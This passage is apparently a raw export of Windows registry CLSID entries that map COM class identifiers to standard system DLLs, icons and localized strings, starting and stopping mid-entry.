%SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\FirewallControlPanel.dll,-12122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304FC8AB-6643-4DAA-9027-4B21389DCB2D}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\RemoveDeviceElevated.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3059ACB9-9875-44CC-ABA9-EAA6EFBEBA39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{30655864-f8cd-45f9-b7d6-6721acb69c5e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3080F90D-D7AD-11D9-BD98-0000947B0257} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-10113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3080F90D-D7AD-11D9-BD98-0000947B0257}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe,-103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3080F90D-D7AD-11D9-BD98-0000947B0257}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3080F90E-D7AD-11D9-BD98-0000947B0257}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe,-258 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3080F90E-D7AD-11D9-BD98-0000947B0257}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{30d49246-d217-465f-b00b-ac9ddd652eb7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\IDStore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{30fb9e79-61dc-4a66-bbff-a362b09a6866}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{31220067-EE3A-4ED7-B579-103D74930CB5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3124C396-FB13-4836-A6AD-1317F1713688}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{312A6884-4ABE-4C4E-AE73-C69874C8318B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3134ef9c-6b18-4996-ad04-ed5912e00eb5}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-117 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3134ef9c-6b18-4996-ad04-ed5912e00eb5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{31350404-77AC-4471-B33A-9020A2EDA1D1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3140F5B6-093F-4F94-9141-5DF9EE10BC27}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{31430c59-bed1-11D1-8De8-00C04FC2E0C7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317E92FC-1679-46FD-A0B5-F08914DD8623} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63515 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3185a766-b338-11e4-a71e-12e3f512a338}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FlightSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{31879719-E751-4DF8-981D-68DFF67704ED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{31b11d80-9ed7-44f7-b1cd-c95992a738b9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{31b231f6-546d-4f9b-ac95-0f963d72559c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{320690f4-8d7b-4f55-a98d-89ebb01fa776}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3213CD15-4DF2-415F-83F2-9FC58F3AEB3A} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3213CD15-4DF2-415F-83F2-9FC58F3AEB3A}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{323CA680-C24D-4099-B94D-446DD2D7249E} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-21796 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{323CA680-C24D-4099-B94D-446DD2D7249E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1024 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{323CA680-C24D-4099-B94D-446DD2D7249E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32433977-2283-4853-8a6d-e7f4cc3053bc}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhtask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{324C321B-D91A-451C-AB3C-362A7849773D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32557D3B-69DC-4F95-836E-F5972B2F6159}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3261BF13-9B3E-4DD5-B6D3-0006F3FFE8BC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32665929-D77E-4ab5-8C08-FBF409B8A233}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\UIRibbon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3279762A-C6C8-4274-A2FB-FD390DAEB7E7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{328489c8-f25e-44b5-93d4-8f811b4dc326}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\AuthExt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{328B0346-7EAF-4BBE-A479-7CB88A095F5B}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{328B0346-7EAF-4BBE-A479-7CB88A095F5B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3292A418-BAC2-4BBF-BB07-66A1CB3B8B7D}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\NetPeerDistCim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\cttunesvr.exe,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cttunesvr.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32be5ed2-5c86-480f-a914-0ff8885a1b3f}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rdpviewerax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32C5A81F-27C0-4E66-A894-786F646F1236}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eapp3hst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32E7DC13-1E22-4D7E-8AC7-D2E718DE8042}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32EAC0F0-1C2B-4775-942E-0AC11121A0F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3318360C-1AFC-4D09-A86B-9F9CB6DCEB9C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msutb.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{333E6924-4353-4934-A7BE-5FB5BDDDB2D6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\NaturalLanguage6.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{334857cc-f934-11d2-ba96-00c04fb6d0d1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33831ED4-42B8-11D2-93AD-00805F853771}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\dsprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{338B40F9-9D68-4B53-A793-6B9AA0C5F63B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\domgmt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33BCC8EC-0D01-4E10-AD3D-4DAF749873ED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33C4643C-7811-46FA-A89A-768597BD7223}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33C53A50-F456-4884-B049-85FD643ECFED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33de48c4-943f-4b96-8cd8-b117c94576cf}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33fd0563-d81a-4393-83cc-0195b1da2f91}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{341301BA-111C-408D-A8E3-14D1DDC62A6F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{347CBD95-DD80-4144-81AF-AE803E633A00}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DXPPS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{348ef17d-6c81-4982-92b4-ee188a43867a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\XpsDocumentTargetPrint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{34996c91-9897-40eb-944b-28b5c9308383}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DevPropMgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{34AB8E82-C27E-11D1-A6C0-00C04FB94F17}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3522D7AF-4617-4237-AAD8-5860231FC9BA} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3522D7AF-4617-4237-AAD8-5860231FC9BA}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3523c2fb-4031-44e4-9a3b-f1e94986ee7f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{352EC2B7-8B9A-11D1-B8AE-006008059382}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{356F2F88-05A6-4728-B9A4-1BFBCE04D838}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49b9-88DD-029876E11C01} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\wpdshext.dll,-512 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wpdshext.dll,-510 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49b9-88DD-029876E11C01}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wpdshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{357b663c-d9fa-4188-99af-2943920f96c5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35A069A1-A029-46AF-B531-454C0F66D61F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\NetworkStatus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35A5E985-12E6-46ee-B385-E887F3940FB0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35B78F79-B973-48C8-A045-CAEC732A35D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35C61CC2-5851-4F2D-89B6-4F9BB4B4193F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524153}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\stobject.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3613F1D2-C9A5-4f41-A070-E5BB823B2E5B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{361778EC-D741-4CE1-90F9-743435F56E13}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\RemoveDeviceContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3692CA39-E082-4350-9E1F-3704CB083CD5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{369647e0-17b0-11ce-9950-00aa004bbb1f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\query.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3697790B-223B-484E-9925-C4869218F17A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36a479ef-8b67-4d01-8dda-753cfcb2dd96}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36BAA497-8C84-4700-96A1-88E1876EC5B9}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36CB6E0C-78C1-42B2-9943-846262F31786}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36f0bd14-d84d-468c-b79c-9990f3fa897f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36F99745-23C9-4C9C-8DD5-CC31CE964390}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{370F8FEA-1B4A-470E-B5F7-25AAFC6702F2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{371CCB71-D045-45C5-9952-BB07B1711B0B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\cmgrcspps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3722c3b1-82e8-4022-8b27-1f8a68b44ac7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3730BBF8-631A-48FB-9085-E2143C11563B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3734FF83-6764-44B7-A1B9-55F56183CDB0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{373984C9-B845-449B-91E7-45AC83036ADE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{374DE290-123F-4565-9164-39C4925E467B}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-184 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{374DE290-123F-4565-9164-39C4925E467B}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{374EE8E8-DEA6-4DB7-B14A-B43EE3E8948E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3756e7f5-e514-4776-a32b-eb24bc1efe7a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{375ff002-dd27-11d9-8f9c-0002b3988e81}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fdwcn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{378E0446-5384-43B7-8877-E7DBDD883446}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{379E501F-B231-11D1-ADC1-00805FC752D8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37A61C8B-7F8E-4d08-B12B-248D73E9AB4F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37de7045-5056-456f-8409-c871e0f8b0e0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37ea3a21-7493-4208-a011-7f9ea79ce9f5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3807BD87-D141-439A-B711-25A053A020F7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38086A84-31E7-4C8E-BB0E-9758D634C7E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Windows.UI.Shell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{381DDA3C-9CE9-4834-A23E-1F98F8FC52BE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3829dfb4-9eed-434e-88c7-dcbe810b1a6e}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{382AC1B5-9C16-4CCD-9D00-D5053977B8D6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sysmain.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{384742B1-2A77-4CB3-8CF8-1136F5E17E59}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dwmapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{384ea5ae-ade1-4e8a-8a9b-7bea78fff1e9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3852C2E2-4A16-4b11-8E71-F8904C37EC3D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{385906fb-1482-4f64-8a23-5d74e1ce1815}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3886CA90-AB09-49D1-A047-7A62D096D275} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3886CA90-AB09-49D1-A047-7A62D096D275}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{389EA17B-5078-4CDE-B6EF-25C15175C751}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\van.dll,-2401 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\van.dll,-2400 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-171 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\OpenWithoutDiagnostics MUIVerb REG_EXPAND_SZ @%systemroot%\system32\van.dll,-2402 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\OpenWithoutDiagnostics\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN /disablediagnostics HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38BFA80B-F989-45B2-AAFD-1E0C04E50E56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38fbe75f-57ac-4c15-8988-7c5284c51508}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcProxyStubs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38FE8128-B282-4A98-B2B0-0BAFB49815FD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3901CC3F-84B5-4FA4-BA35-AA8172B8A09B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsound.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3918D75F-0ACB-41F2-B733-92AA15BCECF6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-37218 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-37219 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{394C052E-B830-11D0-9A86-00C04FD8DBF7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\els.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{395165EF-52F5-4520-81D6-4D18ED96DDCC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{39524FB7-028F-4035-8C2B-8E65D2B17E67}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{395671b6-129e-4e7a-a2d8-204cd8e72d6a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3957a5ba-4448-bec4-24ac-16c4f5784ef5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.cortana.Desktop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{397a2e5f-348c-482d-b9a3-57d383b483cd} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\icsvc.dll,-103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{39AEDC00-6B60-46DB-8D31-3642BE0E4373}\InProcServer32 (Default) REG_EXPAND_SZ %Systemroot%\System32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{39F8D76B-0928-11D1-97DF-00C04FB9618A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcprx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3A410F21-553F-11d1-8E5E-00A0C92C9D5D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmintf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3A57CB65-1857-4239-B130-FA0F8F06522A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3A614B00-FB18-46F3-950E-682A46A48B9F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UICOM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3A66787A-8B15-4321-A09D-6E862D2DD2D4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ABEAFC4-F48F-4517-A9B0-8AD6A94A99A1}\InProcServer32 (Default) REG_EXPAND_SZ 